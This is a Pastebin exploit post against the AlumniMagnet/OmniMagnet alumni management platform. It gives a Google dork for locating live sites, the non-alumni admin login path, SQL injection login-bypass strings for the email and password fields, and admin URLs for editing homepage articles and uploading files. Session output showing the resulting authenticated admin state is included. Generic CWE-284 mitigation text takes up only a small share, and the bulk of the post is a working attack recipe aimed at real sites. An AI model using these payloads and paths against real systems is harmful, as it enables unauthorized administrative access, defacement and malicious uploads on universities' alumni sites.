KingSkrupellos

AlumniMagnet OmniMagnet Improper Access Control Vuln

May 18th, 2019
789
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.65 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : AlumniMagnet OmniMagnet Improper Access Control Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 18/05/2019
  7. # Vendor Homepage : alumnimagnet.com ~ support.omnimagnet.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:Powered By AlumniMagnet + inurl:/article.html?aid= site:org
  12. # Vulnerability Type : CWE-284 [ Improper Access Control ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16.  
  17. ####################################################################
  18.  
  19. # Description about Software :
  20. ***************************
  21. The top alumni associations in the world use AlumniMagnet as their alumni engagement
  22. and volunteer management platform. Made for large universities and colleges, schools
  23. and their chapters. Enterprise Edition involves all of the Central features, but also brings
  24. in connectivity between the university's alumni office and all of its associated
  25. chapters, classes, and clubs.
  26.  
  27. ####################################################################
  28.  
  29. # Impact :
  30. ***********
  31. The software does not restrict or incorrectly restricts access to a resource from
  32. an unauthorized actor.
  33.  
  34. There are two distinct behaviors that can introduce access control weaknesses:
  35.  
  36. Specification: incorrect privileges, permissions, ownership, etc. are explicitly specified for
  37. either the user or the resource (for example, setting a password file to be world-writable, or
  38. giving administrator capabilities to a guest user). This action could be performed by
  39. the program or the administrator. Performing of activities carried out only by administrator
  40. or program became available for all the users.
  41.  
  42. Enforcement: the mechanism contains errors that prevent it from properly enforcing the
  43. specified access control requirements (e.g., allowing the user to specify their own privileges, or
  44. allowing a syntactically-incorrect ACL to produce insecure settings). This problem occurs
  45. within the program itself, in that it does not actually enforce the intended security
  46. policy that the administrator specifies.
  47.  
  48. Potential Mitigations
  49. Phases: Architecture and Design; Operation
  50. Very carefully manage the setting, management, and handling of privileges.
  51. Explicitly manage trust zones in the software.
  52. Phase: Architecture and Design
  53. Strategy: Separation of Privilege
  54. Compartmentalize the system to have "safe" areas where trust boundaries can be
  55. unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary
  56. and always be careful when interfacing with a compartment outside of the safe area.
  57. Ensure that appropriate compartmentalization is built into the system design and that
  58. the compartmentalization serves to allow for and further reinforce privilege separation
  59. functionality. Architects and designers should rely on the principle of least privilege
  60. to decide when it is appropriate to use and to drop system privileges.
  61.  
  62. ####################################################################
  63.  
  64. # Improper Access Control Exploit :
  65. ********************************
  66. Non-Alumni Staff Administrator Page Login Path :
  67. *******************************************
  68. /user.html?op=login&non_alum=true
  69.  
  70. Faculty, Staff, Parents, and Non-Alumni
  71. Members and Guests – click here and login below.
  72.  
  73. Administrator E-Mail Address :
  74. ****************************
  75. 'or''='@gmail.com
  76. 'or''='@yahoo.com
  77. 'or''='@hotmail.com
  78.  
  79. Administrator Password :
  80. ***********************
  81. 'or''='
  82. ' or 1=1 limit 1 -- -+
  83. anything' OR 'x'='x
  84.  
  85. Useable Admin Control Panel Links :
  86. ********************************
  87. We can change the articles on the homepage
  88. without administrator permission.
  89.  
  90. /admin_article.html
  91. /article.html?aid=[ID-NUMBER]
  92. /admin_article.html?op=edit&aid=[ID-NUMBER]
  93.  
  94. /admin_files.html
  95. /admin_files.html?sub_op=upload_files
  96.  
  97. Allowed files: jpg, png, gif, pdf, psd, eps, xls, xlsx, doc, docx, csv, txt, p12
  98. Upload a File. Click Manage Uploads.
  99. At the bottom of the page you can see the link showing where the image is going.
  100. /images/vault/[ID-NUMBER].jpg
  101. Look at File Destination => 'file_dest' => 'images/vault/[ID-NUMBER].jpg',
  102.  
  103. array (
  104. 'captcha' =>
  105. array (
  106. 0 => '[RANDOM-ID-NUMBER]',
  107. ),
  108. 'current_user' => '1',
  109. 'current_user_first_name' => 'Magnet',
  110. 'current_user_aux_id' => '',
  111. 'current_user_permissions' => '[RANDOM-ID-NUMBER]',
  112. 'current_user_email' => '[email protected]',
  113. 'current_user_nickname' => 'Magnet Team',
  114. 'signed_in_at' => '[DOMAIN-ADDRESS-HERE]',
  115. 'main_code' => NULL,
  116. 'last_update_date' => '[RANDOM-ID-NUMBER]',
  117. 'current_user_authenticated' => 'y',
  118. 'last_action_requested' => '[DOMAIN-ADDRESS-HERE]/admin_files.html?sub_op=upload_files',
  119. 'file_dest' => 'images/vault/[ID-NUMBER].jpg',
  120.  
  121. Sometimes it gives error like this -
  122. Then you cannot have an admin account.
  123. ************************************
  124. Access denied...
  125. The page you requested requires staff clearance.
  126. Make sure you are logged into the system before you proceed.
  127. If you feel that this is an error, please contact an admin.
  128.  
  129. Authentication Error
  130. Error code 201
  131. The email/password combination you have entered does not match.
  132. Please check your records and try again.
  133.  
  134. ####################################################################
  135.  
  136. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  137.  
  138. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment